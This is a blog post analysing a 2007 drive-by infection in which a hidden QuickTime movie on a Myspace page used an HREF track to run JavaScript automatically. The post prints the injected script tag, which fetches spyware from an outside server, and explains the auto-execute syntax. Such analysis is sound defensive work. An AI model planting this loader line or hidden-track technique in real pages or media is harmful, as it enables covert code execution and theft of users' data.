Didier Stevens

Monday 12 March 2007

P0wned by a QT movie

Filed under: Malware — Didier Stevens @ 10:14

Here’s an interesting infection vector, used by a new malware: it’s a QuickTime movie!

McAfee VirusScan detects the malware as JS/SpaceTalk Trojan. The description for this malware is empty, your guess of the characteristics of this malware is as good mine.

Interested in the details? Read on!

This Myspace page (of a French rockband) has an embedded QuickTime movie. Here’s the EMBED HTML tag in the source (I changed the formatting to make it more readable):

    hidden=true />

The EMBED tag instructs your browser to play a movie when it renders the HTML page. But in this case, the movie is hidden (attribute hidden is true). It’s a QuickTime movie, downloaded from the profileawareness.com server.

This tys4.mov QuickTime movie is sneaky: it contains JavaScript code to download and execute another JavaScript program. QuickTime has a feature that allows you to embed URLs or JavaScript in a movie. Apple calls this feature HREF tracks. From the Apple site:

An HREF track is a special type of text track that adds interactivity to a QuickTime movie. HREF tracks contain URLs that can specify movies that replace the current movie, load another frame, or that load QuickTime Player. They can also specify JavaScript functions or Web pages that load a specific browser frame or window.

An HREF track is not meant to be displayed; it simply contains link information. The URLs in an HREF track can be interactive or automatic. An interactive URL loads when you click anywhere in the movie’s display area. An automatic URL loads as a movie is playing at the exact frame specified by a text descriptor timestamp in the HREF track. With automatic URLs, you can create a narrated tour of a website, use web pages as slides in a presentation, activate a JavaScript command, or do anything else that requires loading movies or web pages in a predetermined sequence.

The syntax for an HREF track is simple, here’s an example that automatically loads the page http://www.google.com 1 minute into the movie:


  A<http://www.google.com> T<frame>

Let’s take a look inside the tys4.mov QuickTime movie. First we use the strings command to dump all strings contained in this QuickTime file.

  strings tys4.mov

Here is what we see at the end of the dump:


Do you recognize the syntax at the end: A<javascript> T<>
It will automatically execute a JavaScript script when the movie is played (since there is no timestamp, the script executes immediately).
The script is simple: it creates a script tag and adds it to the HTML page, thereby downloading and executing a new script from the profileawareness server:

<script src=’http://profileawareness.com/logs4/sqltrack.js‘/>

It’s this script that is detected by McAfee (at the moment of writing, McAfee was the only antivirus on VirusTotal to detect this script).

The QuickTime fileformat is a binary, hierarchical stream of atoms.
Qtatomizer is a tool to display this hierarchy of atoms.


The QuickTime movie is what is known as a Downloader, but AV programs do not detect it.

The downloaded script is just Spyware, it will collect data about the Myspace user viewing the page and upload it to the profileawareness server.


To summarize the actions:
• You visit a website
• It plays a hidden QuickTime movie
• The QuickTime movie automatically downloads a JavaScript program
• The JavaScript program is executed

Blog at WordPress.com.